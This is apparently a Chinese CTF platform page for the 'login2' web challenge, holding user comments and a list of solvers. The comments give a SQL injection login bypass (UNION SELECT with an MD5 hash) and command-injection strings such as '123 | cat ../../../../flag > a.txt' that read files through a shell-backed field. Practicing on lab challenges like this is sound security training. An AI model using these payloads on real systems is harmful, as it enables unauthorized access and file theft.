login2WEB 未解决

分数: 40 金币: 6
题目作者: 未知
一  血: ShawRoot
一血奖励: 5金币
解  决: 2562
提  示: 命令执行
描  述:
login2
评论
zhuizhui 7月前

' UNION SELECT 'admin' , '99754106633f94d350db34d548d6091a' FROM DUAL;#-- 123;cat /flag > test

回复 0

nihaozy 9月前

学会了一个英语单词tip提示

回复 2
zpxlz 4月前

那很会学习了

回复 1

DoubleUUU 10月前

一顿sqlmap半小时,deepseek秒给payload:username = ' UNION SELECT "admin","202cb962ac59075b964b07152d234b70" -- &password = 123

回复 0

liuguowang75 10月前

登陆后,在检验窗口中输入:123 | ls / > a.txt ,可以看到用户目录中所有文件,

回复 0

sunset2004 1年前

username=admin' union select 1,md5(123)#&password=123,union生成临时表将md5后的123到表里,然后密码输入123即可绕过。RCE直接通过重定向符号即可,将无回显的结果保存到a.txt里即可,123 | cat ../../../../flag > a.txt

回复 3

Zhou_re-pwn 1年前

没太看懂这题出的啥意思,进入监控系统后,和wp的绕过一模一样,结果回显没有显示

回复 0

Yoruko39 1年前

sql注入+RCE,但主要是代码审计,进入命令界面后,发现可以用;截断执行命令,但无回显。 可以用重定向符,将执行结果输出到文件中,再访问/a.txt即可,例如可以;cat * > a.txt,此时可以看到当前目录下所有文件,审计发现flag在一个宏变量$FLAG里,echo到文件即可

回复 0

toonavy 1年前

进程监控系统 输入需要检测的服务 ,退币!!!

回复 0

Zhumeng 1年前

这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag

回复 0

Zhumeng 1年前

这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag

回复 2

WriteUp

image
harry

6 金币

评分(9)

解题动态

十里故清云 攻破了该题 19小时前
Wu. 攻破了该题 1天前
jhon 攻破了该题 4天前
Jazz888 攻破了该题 4天前
TTxyz 攻破了该题 5天前
peaceminus1 攻破了该题 6天前
Jasmine_Iris 攻破了该题 6天前
Mori. 攻破了该题 6天前
2523822945 攻破了该题 6天前
czl2025 攻破了该题 6天前
潭影空人心 攻破了该题 6天前
qq1002517 攻破了该题 7天前
klfx1913 攻破了该题 8天前
Arno_Zoffy 攻破了该题 9天前
Newdap 攻破了该题 9天前
gaoyuxin 攻破了该题 10天前
hdcc1 攻破了该题 10天前
N1 攻破了该题 10天前
yxrqq817423 攻破了该题 11天前
xiaoxiaojiangshi 攻破了该题 11天前
问题反馈